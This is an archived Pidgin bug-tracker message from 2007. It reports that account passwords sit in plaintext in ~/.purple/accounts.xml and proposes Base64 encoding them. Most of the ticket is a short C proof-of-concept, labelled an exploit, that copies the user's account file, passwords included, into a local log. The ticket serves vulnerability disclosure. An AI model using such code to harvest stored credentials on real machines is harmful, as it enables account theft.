[Pidgin] #3253: Linux Local Password Copying Exploit
Pidgin
trac at pidgin.im
Fri Sep 21 09:10:52 EDT 2007
#3253: Linux Local Password Copying Exploit
------------------------+---------------------------------------------------
Reporter: bobbocanfly | Owner: lschiere
Type: defect | Status: new
Priority: minor | Component: unclassified
Version: 2.2.0 | Keywords: security, passwords, easy, to, fix, base64
Pending: 0 |
------------------------+---------------------------------------------------
Passwords stored in ~/purple/accounts.xml are stored in plaintext and easy
for malicious users to get at. Should Base64 them at least.
{{{
//Pidgin "accounts.xml" Local Exploit for Linux
#include <stdio.h>
#include <unistd.h>
#include <pwd.h>
#define MAXPATHLEN 56
int main(int argc, char **argv)
{
FILE *gaim_xml, *output;
int temp;
char gaim[MAXPATHLEN], cwd_buffer[MAXPATHLEN];
char *cwd_pointer;
struct passwd *home = getpwuid(getuid());
sprintf(gaim, "%s/.purple/accounts.xml", home->pw_dir);
gaim_xml = fopen(gaim, "r");
if(gaim_xml == NULL){
printf("\\\\nError opening Pidgin account file. Exiting...\\\\n");
return -1;
}
output = fopen("output.log", "w+");
if(output == NULL){
printf("\\\\nError opening log file. Exiting...\\\\n");
return -1;
}
while(temp != EOF){
temp = fgetc(gaim_xml);
putc(temp, output);
}
fclose(gaim_xml);
fclose(output);
cwd_pointer = getcwd(cwd_buffer, MAXPATHLEN);
printf("\\\\nSuccess! Log file can be found in %s/output.log\\\\n\\\\n",
cwd_pointer);
return 0;
}
}}}
--
Ticket URL: <http://developer.pidgin.im/ticket/3253>
Pidgin <http://pidgin.im>
Pidgin
More information about the Tracker
mailing list